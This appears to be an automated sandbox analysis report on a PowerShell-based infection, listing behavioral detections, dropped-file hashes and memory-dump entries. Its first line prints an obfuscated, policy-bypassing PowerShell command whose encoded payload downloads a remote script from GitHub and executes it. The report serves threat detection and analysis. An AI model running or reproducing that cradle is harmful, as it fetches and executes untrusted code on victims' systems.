C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blacklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES7B02.tmpMD5
d5e28cdeeb350007824b8d16b12281c1
SHA15eab46d0981e7a1305c35909b3fc12175d3619cb
SHA256bf971519c14ff68446285494ee7da17cda21ade9eb681d30623c3d7e0965f028
SHA5121c5f9fd93b80183b56e72a3cf89b3b2e68e4a4d9503d0a2c32b70d6dd9bd832b7a3e37d9cf6cb14c1f3be7f4fd9be19d972461ab9d98258514325c9c22809ba4
-
C:\Users\Admin\AppData\Local\Temp\bsk1nuli\bsk1nuli.dllMD5
6318c3b9a1de7294e015e0f43d83c7f7
SHA1026f671c2f186a6b3d299e999c5d9392cbb2232b
SHA256f383aed2827d38d8183e857162fe3d92e5ded4139ce5873da76e3208481221ca
SHA512fdf2b139e70083dc9687f6473857aa58a1ba487734ee7d0a16d9facd8d97d1cf9827640237e03262699274a798278231759b7bce9c356521ad314188a53f8af0
-
C:\Users\Admin\AppData\Local\Temp\get-points.ps1MD5
dac6b25db50155c0c78d5bf64fb95fa3
SHA19e49c8f7a6df94acdefd0daa4c330f92f6d01d0d
SHA2566967c2ea21792d390309dfd66d56b19f89d89ba4a6fb8f39f10a8212d5e70eaf
SHA512679b3706f2c03898afb4250b1f51d5e0e7187ed923f7d7cc3a06c5f9a1e5b18bbbc46e9c2c9abd0b4b42e5e3a5b2dd668e3057063562b874119c42e855292868
-
C:\Users\Admin\AppData\Local\Temp\get-points.zipMD5
7cac19b2868c41555db4b71219217f9b
SHA1d6f77db578db3c5c572c3a944d9072ed00560dcb
SHA256d8f648e2952466c25343b095ed14591b25b29d0d1c391ca019a8d8f0a39b934a
SHA5125bafea5eed1ba0493188bb79eafda47a141281fb3258be0dfe08b6b78e5dcf731fd2142b94f95b3203fa6daad27fff1f4495ac7bdebe6eb8a9cbe31b16bfc7b6
-
\??\PIPE\lsarpcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\c:\Users\Admin\AppData\Local\Temp\bsk1nuli\CSC5AFA9353C6024F6DB26019D1805C12.TMPMD5
0e951b25d6d3e6fcd0146ee211d6bca8
SHA10a337bcf83e5311229acd85004d713065dff5ba2
SHA256d68214026c8edd7a377c10933f24b8dea5ae60f2d008cd8c642f7a089808d06a
SHA51225da5a631c507e44d40a2fba7a0baf3508d64f92f5e4368f5d0110355d89e4d84234e1cd1ab3f5ea4cbea3581f2306fe970f4762f660eb3024a3698f71a37514
-
\??\c:\Users\Admin\AppData\Local\Temp\bsk1nuli\bsk1nuli.0.csMD5
6f235215132cdebacd0f793fe970d0e3
SHA12841e44c387ed3b6f293611992f1508fe9b55b89
SHA256ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec
SHA512a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e
-
\??\c:\Users\Admin\AppData\Local\Temp\bsk1nuli\bsk1nuli.cmdlineMD5
f11567b52f2859819d6f24d024c44cb7
SHA10e898a841c63cb114a4471a4851b2cbeef26e2ee
SHA256733e388109670a26260067308a1a00a73834d6791f31d978bc2d887496bc06ab
SHA512fb665988c38dcdd842cb7a406e2642a133ff661c11199928d79086cfaa5a39c24ba16a84d063f51ba9eb73f3dccca05b8c19b64044bd910688677b3b992adc05
-
\Windows\Branding\mediasrv.pngMD5
eeb448ea2709c57b9ea2e223d0c79396
SHA138331dd027386151ee37a29a7820570a76427b02
SHA256c82a8ca8997348bc1631637799d8c88e33df3b64d23fdb006a1afdb5e0170272
SHA512c133096ce90e5693669c056a31870b982b162196508babae4d1d9eb4055f2096af9460164d68885693af56389a42977f4193906da1d19f457e26187a46a5e3fc
-
\Windows\Branding\mediasvc.pngMD5
bb873bd05a47f502ee4ed3c4ea749a4f
SHA1e55a6bf49a4833fb9e9b123df39dac9bf507f75a
SHA256a6a28143f81b007c6853cc80829c16d2aadbe427abe1408276b558f34904900a
SHA512ce2a22e5e78d3f01a6880a48153f6d3ba8ff025d7bbfe8949b7742a5b7ffa9e44484027353bb80b70e8cad8181dc26b6aabe637b5f7fd2aa4a99cd880d758548
-
memory/396-45-0x0000000000000000-mapping.dmp
-
memory/416-51-0x0000000000000000-mapping.dmp
-
memory/508-7-0x0000000000000000-mapping.dmp
-
memory/648-47-0x00007FF93EFE0000-0x00007FF93F9CC000-memory.dmpFilesize
9.9MB
-
memory/648-46-0x0000000000000000-mapping.dmp
-
memory/908-10-0x0000000000000000-mapping.dmp
-
memory/932-17-0x0000000000000000-mapping.dmp
-
memory/960-52-0x0000000000000000-mapping.dmp
-
memory/1844-15-0x0000000000000000-mapping.dmp
-
memory/2000-16-0x0000000000000000-mapping.dmp
-
memory/2044-41-0x0000000000000000-mapping.dmp
-
memory/2268-18-0x0000000000000000-mapping.dmp
-
memory/2328-39-0x0000000000000000-mapping.dmp
-
memory/2376-19-0x0000000000000000-mapping.dmp
-
memory/2440-20-0x0000000000000000-mapping.dmp
-
memory/2728-21-0x0000000000000000-mapping.dmp
-
memory/2892-22-0x0000000000000000-mapping.dmp
-
memory/3036-26-0x0000000000000000-mapping.dmp
-
memory/3332-24-0x0000000000000000-mapping.dmp
-
memory/3516-27-0x0000000000000000-mapping.dmp
-
memory/3824-32-0x0000000000000000-mapping.dmp
-
memory/3928-43-0x0000000000000000-mapping.dmp
-
memory/3984-33-0x0000000000000000-mapping.dmp
-
memory/4032-38-0x0000000000000000-mapping.dmp
-
memory/4300-44-0x0000000000000000-mapping.dmp
-
memory/4316-2-0x0000000000000000-mapping.dmp
-
memory/4316-3-0x00007FF93EFE0000-0x00007FF93F9CC000-memory.dmpFilesize
9.9MB
-
memory/4316-4-0x00000195F4D70000-0x00000195F4D71000-memory.dmpFilesize
4KB
-
memory/4316-5-0x00000195F4F20000-0x00000195F4F21000-memory.dmpFilesize
4KB
-
memory/4316-14-0x00000195F4EB0000-0x00000195F4EB1000-memory.dmpFilesize
4KB
-
memory/4372-23-0x0000000000000000-mapping.dmp
-
memory/4464-25-0x0000000000000000-mapping.dmp
-
memory/4468-36-0x0000000000000000-mapping.dmp
-
memory/4472-37-0x0000000000000000-mapping.dmp
-
memory/4484-30-0x0000000000000000-mapping.dmp
-
memory/4624-31-0x0000000000000000-mapping.dmp
-
memory/4700-40-0x0000000000000000-mapping.dmp
-
memory/4720-35-0x0000000000000000-mapping.dmp
-
memory/4748-34-0x0000000000000000-mapping.dmp
-
memory/4760-1-0x0000000001770000-0x0000000001771000-memory.dmpFilesize
4KB